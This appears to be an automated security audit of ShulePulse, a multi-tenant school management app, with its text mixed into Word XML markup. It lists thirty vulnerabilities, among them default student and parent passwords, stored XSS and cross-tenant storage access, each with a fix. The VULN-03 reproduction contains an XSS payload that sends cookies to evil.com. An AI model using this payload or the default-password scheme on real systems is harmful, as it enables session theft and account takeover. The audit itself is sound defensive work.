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SHULEPULSE — COMPLETE SECURITY, DATA PROTECTION &amp; ACCESS CONTROL AUDIT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           SHULEPULSE_SECURITY_AUDIT_REPORT.txt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Generated: 2026-08-24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Auditor:   Automated multi-agent security audit (6 parallel specialist agents)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Scope:     Full ShulePulse codebase — frontend, Supabase migrations, storage,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authentication, authorization, RLS, financial, payroll, XSS/IDOR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Method:    Static code analysis + migration/SQL policy review + configuration audit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Environment: Production codebase (read-only audit, no production data modified)</w:t>
      </w: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EXECUTIVE SUMMARY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ShulePulse is a multi-tenant school management system built on React + Supabase.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system manages students, teachers, finances, payroll, library, reception,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and administrative functions across multiple schools.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OVERALL SECURITY RATING: 4.8/10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CRITICAL ISSUES:  5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HIGH-RISK ISSUES: 9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MEDIUM ISSUES:    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LOW-RISK ISSUES:  6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INFORMATIONAL:    5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most dangerous findings center on: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(a) Core tables (students, attendance, fee_payments) whose RLS policies exist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only in the hosted Supabase database, NOT in version-controlled migrations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— making them unauditable and potentially missing entirely.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(b) Default passwords for ALL student and parent accounts.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(c) Stored XSS via dangerouslySetInnerHTML in document generation.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(d) Cross-tenant file access through public storage buckets.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(e) Platform-wide auth.users exposure via GRANT SELECT to all authenticated.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IMMEDIATE ACTION REQUIRED on the 5 Critical issues before any production deployment.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SECURITY SCORECARD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5/10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Default passwords for students/parents, disabled-user bypass, client-only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session state, no server-side session verification visible.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Authorization: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6/10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Client-side role checks are comprehensive (ProtectedRoute on all routes),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but entire model depends on RLS which has unverifiable gaps.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Multi-School Isolation:            3/10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Several core tables lack version-controlled RLS. Storage buckets allow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cross-tenant access. School switcher writes school_id from client.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RLS: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4/10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Many tables have well-structured policies, but critical tables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(students, attendance, fee_payments) have no migration-of-record.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GRANT on auth.users exposes all user data platform-wide.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Protection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4/10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Stored XSS vectors in document generation. Salary data readable by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all staff roles. Default passwords everywhere.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 Protection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7/10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All routes behind ProtectedRoute. Feature gating is UI-only.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No server-side route enforcement visible.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Validation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5/10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No schema validation library used. Client-side checks are ad-hoc.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Financial amounts have some validation but gaps exist.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Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4/10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Self-approval possible for admins. Duplicate payments not blocked.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Race conditions on receipt numbers. Missing RLS on fee_payments.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Storage Security: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3/10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Public buckets with no school scoping. Cross-tenant file access.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Missing upload validation on finance/document uploads.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Logging: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3/10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Client-side only. Forged entries possible. Critical mutations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(student CRUD, grade edits, fee payments, role switches) not logged.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SCORE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">44/100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Score determination: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Each dimension scored 1-10 based on: coverage of controls, enforcement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mechanism (client-only vs server), verifiability, and gap severity.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Multi-school isolation and RLS scored lowest due to unauditable core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tables and confirmed cross-tenant vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pP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VULNERABILITY FINDINGS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VULN-01: Hardcoded Default Passwords for ALL Student Accounts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VULN-01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Universal Default Password for Student Accounts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CRITICAL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Student Onboarding / Registration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src/services/students/studentService.js:153,174,204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src/pages/admin/StudentsPage.jsx:285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Every student account is created with the hardcoded password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'Student@123'. StudentsPage.jsx includes a "Reset ALL student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passwords to Student@123" bulk action. Any person who learns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this scheme can access every student account in the system.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Full account takeover of all student accounts. In a school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of 1000 students, one leaked default = 1000 compromised accounts.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src/services/students/studentService.js line ~174.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Observe hardcoded 'Student@123' in createStudent function.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Password generation was not implemented; convenience over security.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Generate cryptographically random passwords server-side via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edge function. Force password reset on first login. Remove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bulk password reset to default.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1 — IMMEDIATE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VULN-02: Universal Default Password for ALL Parent Accounts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VULN-02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Universal Default Password for Parent Accounts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CRITICAL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Parent Account Creation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src/services/students/studentService.js:252,278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Every parent account is created with hardcoded 'Parent@123'.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Password is echoed back and displayed in the UI after creation.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Parent accounts are created client-side via supabase.auth.signUp().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Full account takeover of all parent accounts. Combined with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parent access to student grades, fees, and attendance —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massive privacy breach.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src/services/students/studentService.js line ~252.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Same as VULN-01 — no server-side password generation.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Same as VULN-01 — server-generated random passwords + forced reset.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1 — IMMEDIATE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VULN-03: Stored XSS via dangerouslySetInnerHTML in Document Generation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VULN-03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Stored Cross-Site Scripting in Report Cards &amp; Certificates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CRITICAL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Report Cards, Transcripts, Certificates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src/components/students/ReportCard.jsx:593-632 (7 sinks)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src/pages/Registrar/Alumni.jsx:891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src/pages/Registrar/DocumentsCertificates.jsx:553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HTML strings are built by interpolating user-controlled values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(student names, school names, subject names, discipline records,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school logo URLs) into raw HTML without any escaping. These are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rendered via dangerouslySetInnerHTML. A student named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'&lt;img src=x onerror=alert(document.cookie)&gt;' or a malicious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school logo_url containing a script would execute JavaScript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for any admin/registrar viewing the document.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Full JavaScript execution in admin sessions. Attacker can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steal session tokens (stored in localStorage), perform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actions as admin, exfiltrate data, or pivot to other schools.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1. Create a student with name: &lt;img src=x onerror="fetch('https://evil.com/?c='+document.cookie)"&gt;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2. Navigate to Report Cards, generate report for that student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3. The script executes when the report renders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HTML string concatenation instead of JSX rendering. No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input sanitization/escaping applied to interpolated values.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Add an esc() function that HTML-encodes &lt;, &gt;, &amp;, ", '.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Apply to ALL interpolated values in HTML string builders.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Alternatively, refactor to use JSX templating instead of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dangerouslySetInnerHTML.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1 — IMMEDIATE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VULN-04: Platform-Wide auth.users Data Exposure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VULN-04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GRANT SELECT on auth.users to All Authenticated Users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CRITICAL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Database Configuration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supabase/FIX_RLS.sql:1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FIX_RLS.sql contains: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"GRANT SELECT ON auth.users TO authenticated"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This allows ANY authenticated user (including students, parents,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teachers from ANY school) to read the auth.users table, which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contains email addresses, phone numbers, raw_user_meta_data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(including roles), and authentication metadata for ALL users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across ALL schools.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Complete user enumeration across all schools. Email addresses,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roles, and metadata for every user in the system are readable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by any student or parent.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supabase/FIX_RLS.sql line 1.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Overly broad GRANT statement likely added to fix a specific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query issue without considering the security implications.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REVOKE SELECT ON auth.users FROM authenticated.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Access auth data only through profiles table (which has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proper RLS) or through SECURITY DEFINER functions.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1 — IMMEDIATE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VULN-05: Core Table RLS Policies Missing from Version Control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VULN-05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Unauditable RLS on Critical Tables (students, attendance, fee_payments)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CRITICAL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Database / All features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supabase/migrations/ (absence of policies)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The following critical tables have NO RLS policy definitions in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any migration file in the repository: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- students (core PII table — 0 policies in repo)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- attendance (0 policies in repo)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- fee_payments (0 ENABLE ROW LEVEL SECURITY in repo)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- classes, subjects (0 policies in repo)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These tables are managed directly in the hosted Supabase dashboard,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making them unauditable from code. If RLS is not enabled on these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tables, any authenticated user can read/write all schools' data.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If RLS is disabled or misconfigured on these tables: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- Any user can read all students across all schools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- Any user can modify any student record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- Any user can read all financial payment data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This is the single most dangerous class of vulnerability.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Run against live DB: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SELECT relname, relrowsecurity FROM pg_class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WHERE relnamespace='public'::regnamespace AND relkind='r'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AND relname IN ('students','attendance','fee_payments');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Tables created/managed outside the migration system. RLS policies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applied via dashboard UI instead of version-controlled SQL.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Create migration files that ENABLE ROW LEVEL SECURITY and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DEFINE POLICIES for all critical tables. Use the Supabase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CLI to pull existing policies from the live DB and commit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them to version control.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1 — IMMEDIATE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VULN-06: Any Authenticated User Can Create Schools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VULN-06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schools Table INSERT Policy Too Broad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HIGH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School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supabase/migrations/007_rls_policies.sql:29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The schools INSERT policy (schools_insert_superadmin) allows ANY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authenticated user to create school rows. The policy name suggests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it was intended for superadmin only, but the USING clause grants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INSERT to all authenticated users.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Any authenticated user (student, parent, teacher) can create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new school records in the database.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supabase/migrations/007_rls_policies.sql line ~29.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Policy likely created with broad permissions during initial setup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and never tightened.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Drop the overly broad INSERT policy. Create a new policy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that restricts school creation to superadmin role only.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2 — HIGH PRIORITY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VULN-07: Cross-Tenant File Access via Public Storage Buckets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VULN-07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Storage Buckets Allow Cross-School File Access and Deletion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HIGH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File Storage (all document types)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supabase/migrations/043_accounts_payable.sql:254-268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supabase/migrations/073_add_avatars_storage.sql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Multiple storage buckets are configured as public with minimal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access controls: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- finance-attachments: Public SELECT with NO auth or school check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- school-assets: Public read; any authenticated user can overwrite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- documents: No policies found in migrations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Finance attachments include invoices, receipts, and payment vouchers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for ALL schools — readable by anyone with the file URL.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Any user can read financial documents from any school. Any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authenticated user can delete or overwrite avatars.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1. Access any finance-attachment URL directly (no auth needed)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2. Upload any file to school-assets bucket as any user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Buckets created with public access for convenience. Missing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school_id path prefixing and proper policy scoping.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Make finance-attachments and documents private. Add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school_id prefix to all file paths. Create policies that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check auth.uid() school_id matches path prefix. Remove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public read from sensitive buckets.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2 — HIGH PRIORITY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VULN-08: Disabled Users Retain Full Access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VULN-08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Disabled User Accounts Not De-Authenticated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HIGH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User Management / Authentication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src/pages/admin/StudentsPage.jsx:280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src/store/authStore.js (init/onAuthStateChange)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toggleUserDisabled() sets profiles.disabled = true, but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authStore.init() and onAuthStateChange never check the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disabled flag. A disabled user retains their active session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indefinitely and can continue accessing all features.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Admin disables a compromised account, but the attacker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retains full access until the session expires (which is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managed by Supabase, not the app).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1. Log in as a user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2. Have admin disable that user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3. Refresh page — user still has full access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No client-side or server-side disabled check after initial auth.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In authStore.init(), after fetching profile, check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profile.disabled === true. If so, call signOut() and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redirect to login with "Account disabled" message.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2 — HIGH PRIORITY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VULN-09: School Switcher Writes school_id from Client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VULN-09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Client-Controlled School ID Assignment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HIGH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School Switcher / Auth Store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src/store/authStore.js:11-19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selectSchool() directly updates profiles.school_id from the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client via supabase.from('profiles').update({school_id: id}).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If the RLS policy allows this self-update, any authenticated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user can switch themselves to any school and access its data.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Cross-tenant data access by changing school_id in the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profiles table.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src/store/authStore.js lines 11-19. Observe direct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update to school_id without server validation.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No server-side validation that the user is authorized to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join the target school.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Create a SECURITY DEFINER RPC function that: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1. Validates the user is superadmin OR has an explicit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 school membership record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2. Updates school_id through the function only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3. Disables direct UPDATE on profiles.school_id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2 — HIGH PRIORITY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VULN-10: Admin Self-Approval of Financial Transactions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VULN-10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Separation of Duties Bypass in Expense/AP Approval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HIGH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Expenses, Accounts Payable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src/pages/Finance/Expenses.jsx:241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src/pages/Finance/AccountsPayable.jsx:348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The self-approval check explicitly exempts admin-role users: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if (exp.created_by === userId &amp;&amp; !isAdminRole(role))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This means an admin can create AND approve their own expense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requests and AP invoices, violating separation of duties.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An admin could create a fraudulent expense and approve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it themselves, then process payment — no second pair of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eyes on the transaction.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Expenses.jsx line 241. Note the !isAdminRole() escape.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Self-approval block was implemented for non-admins but admin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was given an explicit exception.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Remove the !isAdminRole(role) escape. No user should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approve their own transactions regardless of role.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2 — HIGH PRIORITY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VULN-11: Salary Data Readable by All Staff Roles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VULN-11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Overly Broad Read Policies on Payroll Tables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HIGH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Payroll / HR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supabase/migrations/ (staff_select_* policies)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staff_select_* RLS policies on payroll_employees, payroll_runs,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payroll_lines allow SELECT for any authenticated profile in the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same school with ANY role — including teachers, class teachers,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and librarians who should not see salary information.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Any teacher can query salary data for all staff members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in their school via the Supabase API.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SQL query as a teacher-role user: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SELECT * FROM payroll_employees WHERE school_id = get_my_school_id();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staff_select_* policies were created with broad role lists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to simplify read access, without considering salary sensitivity.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Replace staff_select_* on payroll tables with role-restricted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policies that exclude teacher, class_teacher, librarian, parent,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and student roles.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2 — HIGH PRIORITY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VULN-12: SECURITY DEFINER Functions Without search_path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VULN-12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Function Hijacking via search_path Manipulation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MEDIUM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Database Functions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supabase/migrations/068_fix_profiles_rls_recursion.sql:7-24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supabase/migrations/070_superadmin_sync.sql:10-20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get_my_school_id() and get_my_role() are SECURITY DEFINER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functions that reference unqualified table names (profiles)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without SET search_path. An attacker could create a malicious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profiles table in a different schema and hijack the function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to read/write data as the postgres superuser.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Potential privilege escalation to database superuser level.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Review function definitions in migrations 068/070.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Missing SET search_path = public on SECURITY DEFINER functions.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Add SET search_path = public to all SECURITY DEFINER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function definitions.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3 — SECURITY HARDENING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VULN-13: Payment Secrets Potentially Readable by Non-Superadmins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VULN-13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Platform Settings Table May Expose Payment API Secrets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MEDIUM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Platform Settings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src/features/superadmin/platformSettingsService.js:80-95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Platform settings schema includes stripe_secret_key,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mpesa_consumer_secret, flutterwave_secret_key, and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pesapal_consumer_secret. If the platform_settings table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doesn't have superadmin-only SELECT policies, these payment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secrets could be readable by lower-privileged users.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Theft of payment API credentials.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platformSettingsService.js lines 80-95 to see the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schema fields. Verify RLS on platform_settings table.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Payment secrets stored in a regular table without strict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access controls.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Verify platform_settings has superadmin-only SELECT policy.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Consider using Supabase Vault for secret storage instead.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3 — SECURITY HARDENING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VULN-14: Race Conditions on Receipt Numbers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VULN-14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Non-Atomic Receipt Number Generation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MEDIUM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Fee Payments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src/pages/Finance/Payments.jsx:134-147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Receipt numbers are generated by reading the last row, then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incrementing — a classic race condition. Two concurrent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payments can receive the same receipt number. Unlike journal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entries (which use an atomic counter via migration 055), receipts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have no such protection.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Duplicate receipt numbers undermine financial integrity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and audit trails.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Payments.jsx lines 134-147. Note the read-then-write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pattern vs journal entry atomic counter in migration 055.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Receipt number generation was implemented before the atomic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counter pattern was established for journals.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Create an atomic counter function similar to next_journal_number.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Add UNIQUE constraint on (school_id, receipt_number).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3 — SECURITY HARDENING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VULN-15: Duplicate Payments Not Blocked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VULN-15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No Idempotency Check on Payment Recording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MEDIUM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Fee Payments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src/pages/Finance/Payments.jsx:123-208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handleRecordPayment has no check for duplicate references,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student+amount combinations, or idempotency keys. Identical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payments can be recorded multiple times.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Double-crediting of student accounts. Financial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discrepancy and potential fraud.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Payments.jsx lines 123-208. Note absence of any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duplicate check before insert.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No idempotency implementation in the payment recording flow.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Add a unique constraint or idempotency check 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(school_id, student_id, reference_number, amount).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3 — SECURITY HARDENING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VULN-16: Logout Failure Leaves User Authenticated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VULN-16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No Error Handling on signOut() Failure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MEDIUM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Authentication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src/store/authStore.js:53-56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If supabase.auth.signOut() throws (network error, API timeout),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the error is unhandled, set({user:null}) never runs, and the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user remains authenticated with a valid session.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User cannot log out on unreliable networks.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authStore.js lines 53-56. Note no try/catch.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Missing error handling in logout flow.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Wrap signOut() in try/catch. On error, still clear local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state and redirect to login. Add selectedSchool cleanup.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3 — SECURITY HARDENING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VULN-17: Non-Atomic Payment + Ledger + GL Write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VULN-17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Payment Recording Lacks Transactional Consistency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MEDIUM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Fee Payments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src/pages/Finance/Payments.jsx:187-201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Payment recording performs three sequential writes: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fee_payments insert → student_ledger insert → GL journal post.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If any step fails, the data is left inconsistent (payment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recorded but no ledger/GL entry, or ledger entry with no GL).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Financial data inconsistency. Payments visible without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corresponding ledger entries.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Payments.jsx lines 187-201.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Client-side multi-step write without transaction wrapping.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Move payment+ledger+GL writes into a single PostgreSQL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transaction via a SECURITY DEFINER RPC function.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3 — SECURITY HARDENING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VULN-18: SVG Upload XSS Vector in Logo Uploader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VULN-18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SVG Files Accepted in Public Logo Bucket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MEDIUM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Branding / Logo Upload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src/features/branding/LogoUploader.jsx:14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LogoUploader accepts image/svg+xml files, which are uploaded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to the public school-assets bucket. SVGs can contain embedded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JavaScript that executes when served from a public bucket.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Stored XSS via malicious SVG logo. Script executes for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any user viewing the school branding.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LogoUploader.jsx line 14. Note SVG in accepted types.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SVG accepted without sanitization.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Remove SVG from accepted types. Only allow PNG/JPEG/WEBP.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If SVG is required, sanitize with DOMPurify before upload.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3 — SECURITY HARDENING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VULN-19: Student Documents Stored Without School Scoping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VULN-19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Student Document Paths Lack school_id Prefix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MEDIUM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Student Documents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src/components/students/StudentDocuments.jsx:29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Student documents are stored at path students/{studentId}/...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without a school_id prefix. Combined with public URLs stored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in file_url, documents from any school can potentially be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accessed by guessing student UUIDs.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Cross-tenant document access if storage policies are weak.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StudentDocuments.jsx line 29. Note path structure.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Path structure designed for single-school deployment.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Restructure paths to {schoolId}/students/{studentId}/...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Add storage policies that enforce school_id path matching.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3 — SECURITY HARDENING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VULN-20: Client-Only Audit Logging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VULN-20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Audit Log Entries Can Be Forged or Suppressed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MEDIUM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Audit Logging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src/features/audit/auditService.js:7-14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Audit log entries are written client-side via the anon key.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Any authenticated user can insert fabricated audit entries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for their school, or simply not call logAction to suppress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logging. Failures are silently swallowed (console.error).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Audit trail is unreliable and can be manipulated.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auditService.js lines 7-14. Note client-side insert.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Audit logging implemented at the application layer instead of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as database triggers or SECURITY DEFINER functions.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Move critical audit logging to PostgreSQL triggers or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SECURITY DEFINER functions that run server-side and cannot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be bypassed by clients.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3 — SECURITY HARDENING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VULN-21: RLS Policy Role-Name Drift (deputy_admin vs deputy_administrator)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VULN-21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Inconsistent Role Names in RLS Policies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LOW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Multiple RLS Policies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supabase/migrations/070_superadmin_sync.sql (grades, cbc)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Some RLS policies reference 'deputy_admin' while the actual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role constant is 'deputy_administrator'. Users holding one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spelling silently fail the other policy, losing access to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features they should have.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Authorization inconsistency — some features inaccessible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for deputy_administrator users.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Compare role names in 070 grades policies vs actual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ROLES constant in src/utils/roles.js.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Role name not centralized; policies written independently.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Audit all RLS policies for role name consistency.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Use a central role enum or constant.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4 — LONG-TERM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VULN-22: No DB-Level Negative Amount Checks on Journal Lines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VULN-22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Negative Debit/Credit Values Possible in Journal Entries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LOW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Accounting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src/pages/Finance/accountsUtils.js:190-200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balanceError() accepts negative debit values alongside credits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(e.g., debit=-500, credit=500 balances). No DB-level CHECK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constraint enforces debit/credit &gt;= 0 on journal_entry_lines.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Potential ledger manipulation through negative values.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accountsUtils.js lines 190-200.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No CHECK constraint on journal_entry_lines.debit/credit.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Add CHECK constraints: debit &gt;= 0, credit &gt;= 0.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Update balanceError() to reject negative values.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4 — LONG-TERM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VULN-23: Feature Caching Allows 60-Second Stale Access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VULN-23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Feature Access Cache TTL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LOW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Feature Access Control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src/features/access/featureAccessService.js:3-6,12-14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Feature access is cached for 60 seconds (CACHE_TTL = 60000).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A revoked feature can remain visible for up to 60 seconds.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Minor — brief window where locked features remain accessible.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Client-side caching for performance.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Reduce TTL or add server-side enforcement so cache is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advisory only, not authoritative.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4 — LONG-TERM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VULN-24: Role Switch Not Audited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VULN-24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Role Switching Has No Audit Trail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LOW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Role Switcher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src/components/RoleSwitcher.jsx:43-52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switchRole() updates profiles.role directly without calling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logAction(). Users with multiple roles can switch between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them with no audit trail.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Privilege changes are not traceable.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RoleSwitcher.jsx lines 43-52. Note absence of logAction.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Role switch was not included in audit logging scope.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Add logAction call in switchRole() with old/new role values.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4 — LONG-TERM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VULN-25: Audit Logging Bug in SchoolCategoriesPage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VULN-25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Incorrect logAction Call Signature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LOW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School Categories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src/pages/superadmin/SchoolCategoriesPage.jsx:41,60,73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logAction is called with positional arguments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logAction('school_category', 'add', {...}) but the function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expects a single object argument. Audit writes fail silently.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School category changes are not logged.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SchoolCategoriesPage.jsx lines 41, 60, 73.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API signature mismatch — function was refactored to accept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an object but callers weren't updated.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Update logAction calls to use object syntax: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logAction({ action: 'school_category.add', details: {...} })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4 — LONG-TERM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VULN-26: Hardcoded Supabase URL and Anon Key as Fallback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Supabase Credentials Hardcoded in Source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INFORMATIONAL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Supabase Client Configuration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src/lib/supabase.js:7-8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src/features/superadmin/userService.js:4-5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Supabase URL and anon key are hardcoded as inline fallback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defaults when env vars are missing. The anon key has role:anon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(not service_role), so this is not directly exploitable, but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it defeats environment variable rotation and leaks the project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endpoint in the bundle.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Low — anon keys are designed to be public. But hardcoded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values prevent credential rotation.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supabase.js lines 7-8.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Development convenience for working without .env file.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Remove hardcoded fallbacks. Fail loudly when env vars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are missing. Ensure .env is properly gitignored.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4 — LONG-TERM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VULN-27: No Schema Validation Library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VULN-27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Ad-Hoc Client-Side Input Validation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INFORMATIONAL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All forms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33 onSubmit handlers across the codebase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No schema validation library (zod, yup, react-hook-form) is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used anywhere. All validation is ad-hoc and varies per form.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Some forms have minimal checks (trim only), others validate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types and ranges.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Inconsistent validation quality. Some forms may accept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unexpected input.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Grep for onSubmit handlers in src/.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Validation was implemented ad-hoc as forms were built.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Adopt a schema validation library (zod recommended) for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consistent, declarative validation across all forms.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4 — LONG-TERM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VULN-28: Login Role Fallback to user_metadata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VULN-28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Role Resolution Uses Client-Writable user_metadata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INFORMATIONAL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Login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src/pages/Login.jsx:35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Role is resolved with fallback to data.user.user_metadata.role.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user_metadata is client-writable. While ProtectedRoute validates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against the DB profile (mitigating impact), any code path that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trusts user_metadata for authz decisions would be exploitable.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Low — contained by DB profile validation in ProtectedRoute.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Login.jsx line 35.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Legacy fallback before DB profile was the source of truth.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Remove user_metadata.role fallback. Always use DB profile.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4 — LONG-TERM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VULN-29: Parent Portal Queries Tables Without Verified RLS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VULN-29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Parent Access to Attendance/fee_assessments May Lack RLS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INFORMATIONAL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Parent Portal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src/pages/parent/AttendancePage.jsx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src/pages/parent/FeePaymentsPage.jsx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Parent portal queries attendance and fee_assessments tables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that have no RLS policies in the migration repository. If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RLS is not configured on these tables in the live DB, parents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could read data from other students or schools.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Potential cross-student data exposure for parents.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parent attendance/fee pages. Check for table RLS.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Same as VULN-05 — tables managed outside version control.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Verify RLS on attendance and fee_assessments in live DB.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Create migration files for these policies.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2 — HIGH PRIORITY (verify live DB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="1"/>
        </w:pBd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VULN-30: Student Document Upload Has No Server-Side Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="999999" w:sz="1"/>
        </w:pBdr>
        <w:spacing w:after="6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ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-30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Title: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Finance/Document Upload Buckets Lack Type/Size Validation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Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORMATIONAL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Module: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">File Uploads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Affected Component: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">src/components/students/StudentDocuments.jsx:29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src/pages/Finance/Expenses.jsx:332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The documents and finance-attachments buckets have no file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type or size validation in storage policies. Client-side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validation exists for avatars (AvatarUpload.jsx) but not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for these buckets.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Impact: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Users can upload any file type/size to these buckets.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Reproduction: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Read storage policy definitions for these buckets.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Root Cause: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Storage policies created without validation rules.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Recommended Fix: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Add storage policy functions that validate file MIME type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and size on upload.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Priority: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">PHASE 4 — LONG-TERM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pP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4. MULTI-SCHOOL ISOLATION REPORT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Legend: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ENFORCED = RLS policy confirmed in migration files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UNVERIFIABLE = Table has no RLS in repo (may exist in live DB)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BROKEN = Confirmed cross-tenant access vector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PARTIAL = Some isolation but gaps exist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TABLE                        | SCHOOL ISOLATION | RLS STATUS       | RISK LEVEL | RESULT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-----------------------------|------------------|------------------|------------|-------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profiles                     | ENFORCED         | Policies in 067-070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schools                      | BROKEN           | INSERT open to all  | HIGH     | FAIL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students                     | UNVERIFIABLE     | No policies in repo | CRITICAL | NOT TESTED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teachers                      | ENFORCED         | Policies in 067-068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attendance                    | UNVERIFIABLE     | No policies in repo | CRITICAL | NOT TESTED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grades                        | ENFORCED         | Policies in 022,070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fee_payments                  | BROKEN           | No RLS enabled      | CRITICAL | FAIL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student_ledger                | ENFORCED         | school_isolation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receipts                      | ENFORCED         | school_isolation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fee_categories                | ENFORCED         | school_isolation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fee_structures                | ENFORCED         | school_isolation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fee_assessments               | UNVERIFIABLE     | No policies in repo | HIGH     | NOT TESTED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payroll_employees             | ENFORCED         | fin_all_* + staff   | MED      | PASS*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payroll_runs                  | ENFORCED         | fin_all_* + staff   | MED      | PASS*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payroll_lines                 | ENFORCED         | fin_all_* + staff   | MED      | PASS*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journal_entries               | ENFORCED         | fin_all_* + staff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journal_entry_lines           | ENFORCED         | fin_all_* + staff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notices                       | ENFORCED         | staff_all + reads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plans                         | ENFORCED         | SEL public, ALL supa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feature_catalog               | ENFORCED         | SEL public, ALL supa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school_feature_overrides      | ENFORCED         | school-scoped   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visitors                      | ENFORIFIED       | In migration 056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appointments                  | ENFORCED         | In migration 056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front_office_requests         | ENFORCED         | In migration 056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discipline_records            | ENFORCED         | school_isolation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student_documents             | ENFORCED         | school-scoped   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timetable_slots               | ENFORCED         | school_isolation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library_* tables              | ENFORCED         | Various policies    | LOW     | PASS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auth.users                    | BROKEN           | GRANT to all auth   | CRITICAL | FAIL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finance-attachments (storage) | BROKEN           | Public, unscoped    | HIGH     | FAIL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school-assets (storage)       | BROKEN           | Public, overwritable| HIGH     | FAIL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documents (storage)           | UNVERIFIABLE     | No policies in repo | HIGH     | NOT TESTED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exam-papers (storage)         | ENFORCED         | School-path scoped  | LOW     | PASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
